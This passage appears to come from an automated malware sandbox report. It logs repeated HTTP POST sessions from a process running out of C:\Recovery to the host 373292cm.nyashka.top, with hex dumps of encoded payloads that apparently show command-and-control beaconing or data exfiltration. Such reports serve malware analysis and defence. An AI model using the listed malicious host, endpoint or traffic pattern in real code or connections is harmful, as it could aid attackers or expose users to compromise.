                                    Data Ascii: ZU\TTDTQ[_ZQYPXQW^]SW\ST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,"=;409= ^?-!Z)=[#?3W#!8R+98 09X8&F$.Y/
                                    Aug 25, 2024 15:44:01.813946962 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:01.941901922 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.64976280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:02.062608957 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:02.419992924 CEST2516OUTData Raw: 5f 56 5c 50 54 45 51 5a 5b 5f 5a 51 59 53 58 5f 57 5c 5d 5f 57 50 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _V\PTEQZ[_ZQYSX_W\]_WPS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.885$_ :*-<^(="($4Z0#'<9049Y..&F$.Y/5
                                    Aug 25, 2024 15:44:02.745142937 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:02.943983078 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.64976380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:03.237884045 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:03.591744900 CEST2516OUTData Raw: 5f 51 5c 56 51 47 54 5d 5b 5f 5a 51 59 51 58 50 57 5d 5d 5a 57 50 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\VQGT][_ZQYQXPW]]ZWPS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./'E"> X40>==#?*?#0420V+;_#0,>&F$.Y/=
                                    Aug 25, 2024 15:44:03.924252987 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:04.058253050 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.64976480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:04.188342094 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:04.544873953 CEST2516OUTData Raw: 5a 51 59 50 54 49 54 51 5b 5f 5a 51 59 5f 58 5f 57 5b 5d 5c 57 50 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQYPTITQ[_ZQY_X_W[]\WPS\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X.0'"0^436)>+<+#Z# W$<_4!\,.&F$.Y/
                                    Aug 25, 2024 15:44:04.859798908 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:04.995398998 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.64976580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:05.124339104 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:05.534811020 CEST2516OUTData Raw: 5a 55 5c 57 51 40 51 5b 5b 5f 5a 51 59 51 58 55 57 58 5d 59 57 58 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZU\WQ@Q[[_ZQYQXUWX]YWXS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/ '5>$_4!X+.4]?>=?,",/S428<_7\# 5Y8>&F$.Y/=
                                    Aug 25, 2024 15:44:05.788036108 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:05.922456980 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.64976680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:06.057090044 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:06.404344082 CEST2516OUTData Raw: 5a 52 5c 55 54 41 54 5d 5b 5f 5a 51 59 51 58 51 57 58 5d 5f 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\UTAT][_ZQYQXQWX]_W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,0/6#5\>-\+>><(4</V!"0S<:( %_8&F$.Y/=
                                    Aug 25, 2024 15:44:06.721429110 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:06.918792009 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.64976780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:06.973325968 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.64976880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:07.046091080 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:07.404225111 CEST2516OUTData Raw: 5f 5d 59 55 54 40 51 59 5b 5f 5a 51 59 5f 58 50 57 58 5d 52 57 59 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]YUT@QY[_ZQY_XPWX]RWYS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-8+@6-+7#)\*= X?X%[(/ $7$W?)Y#3)/&F$.Y/
                                    Aug 25, 2024 15:44:07.722455025 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:07.925570011 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.64976980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:08.483916044 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:08.841804028 CEST2516OUTData Raw: 5a 51 59 50 54 40 51 5c 5b 5f 5a 51 59 54 58 5f 57 5d 5d 5e 57 5e 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQYPT@Q\[_ZQYTX_W]]^W^S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.3!X 9)4<:?[( ,?P#+(_4#1\8&F$.Y/)
                                    Aug 25, 2024 15:44:09.165605068 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:09.299252987 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.64977080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:09.424556971 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:09.779802084 CEST2516OUTData Raw: 5f 54 5c 5f 54 49 54 5c 5b 5f 5a 51 59 52 58 5e 57 5f 5d 5e 57 5c 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _T\_TIT\[_ZQYRX^W_]^W\SX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-8,6=77*[ ]<^+#4#/(); %\,&F$.Y/1
                                    Aug 25, 2024 15:44:09.826024055 CEST1236OUTData Raw: 38 33 03 2b 36 41 17 21 3e 3a 33 36 3c 55 2d 3f 31 04 16 03 29 2d 26 1e 33 00 0f 58 0d 3d 3f 30 3a 3b 3e 22 07 01 35 0d 3e 01 28 23 02 32 1a 2f 3a 01 03 3a 3c 02 39 31 32 3e 01 3a 06 2b 2f 18 22 30 35 08 34 5f 3e 27 26 07 01 25 10 00 20 1d 07 26
                                    Data Ascii: 83+6A!>:36<U-?1)-&3X=?0:;>"5>(#2/::<912>:+/"054_>'&% &3^]9.#:074,.=?</)[/:=).8!=;"&3E &*Z<&#!2T>(?#4/>&'[5<*3><<$V=04>)&/;=3&?3Z7>_<%74:?Y?73,+<583<8(?:?,'2>
                                    Aug 25, 2024 15:44:10.102471113 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:10.251214027 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.64977180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:10.382642984 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:10.732539892 CEST2516OUTData Raw: 5a 56 59 57 51 40 54 59 5b 5f 5a 51 59 5f 58 57 57 5d 5d 5a 57 5b 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZVYWQ@TY[_ZQY_XWW]]ZW[S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y,3#.+7 2*[4(>9_)=77'Q#!/*:$40,>&F$.Y/
                                    Aug 25, 2024 15:44:11.059572935 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:11.193948984 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.64977280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:11.314769030 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:11.669878006 CEST2516OUTData Raw: 5f 5d 59 53 54 43 54 5e 5b 5f 5a 51 59 53 58 56 57 51 5d 5a 57 51 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]YSTCT^[_ZQYSXVWQ]ZWQS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.3$"># **3>..+-4 0#!P(770/.&F$.Y/5
                                    Aug 25, 2024 15:44:11.979078054 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.64977380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:12.051295996 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:12.404232025 CEST1840OUTData Raw: 5a 57 5c 57 51 44 51 5c 5b 5f 5a 51 59 54 58 51 57 58 5d 5f 57 5f 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZW\WQDQ\[_ZQYTXQWX]_W_S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.. ;C"(_"3!Z>?<6?=$4S ((#1;>&F$.Y/)
                                    Aug 25, 2024 15:44:12.745075941 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:12.883660078 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 2a 0b 22 5a 25 15 20 19 25 33 3a 52 2b 2e 3f 5f 3e 3e 2d 5e 30 06 29 5f 26 2d 20 1c 27 3b 0c 05 28 2d 26 51 31 3f 33 1e 2d 34 2b 5d 0c 13 21 07 23 29 3a 10 32 05 3c 58 29 16 27 5d 35 2c 2d 01 2b 29 35 54 3f 3c 2c 5e 3e 29 37 5c 3c 3a 31 0a 2f 38 3e 05 2d 20 0f 0e 37 04 2b 52 0d 11 27 0d 3f 13 25 1e 2a 3e 19 5d 22 5e 33 58 33 2d 25 09 25 0c 2e 54 24 17 27 01 27 22 21 1f 33 0f 39 51 25 15 25 03 25 01 21 51 36 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U*"Z% %3:R+.?_>>-^0)_&- ';(-&Q1?3-4+]!#):2<X)']5,-+)5T?<,^>)7\<:1/8>- 7+R'?%*>]"^3X3-%%.T$''"!39Q%%%!Q62#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.64977480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:12.203104019 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:12.563148022 CEST2516OUTData Raw: 5a 50 5c 52 54 47 54 50 5b 5f 5a 51 59 50 58 56 57 5f 5d 5a 57 5d 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\RTGTP[_ZQYPXVW_]ZW]SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#C!.873=])[4+-6(.+ <(#1<R(: =/&F$.Y/
                                    Aug 25, 2024 15:44:12.864228964 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:12.997497082 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.64977680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:13.127667904 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:13.486105919 CEST2516OUTData Raw: 5f 5c 5c 50 54 43 54 5d 5b 5f 5a 51 59 51 58 55 57 5f 5d 58 57 5a 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\\PTCT][_ZQYQXUW_]XWZS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._.0'"[;7 \==>=%Z?=87/3!!,*)340..&F$.Y/=
                                    Aug 25, 2024 15:44:13.794229031 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:13.949173927 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    51192.168.2.64977780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:14.078092098 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:14.435457945 CEST2516OUTData Raw: 5a 51 5c 52 51 44 51 5b 5b 5f 5a 51 59 52 58 5e 57 5c 5d 5a 57 5b 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
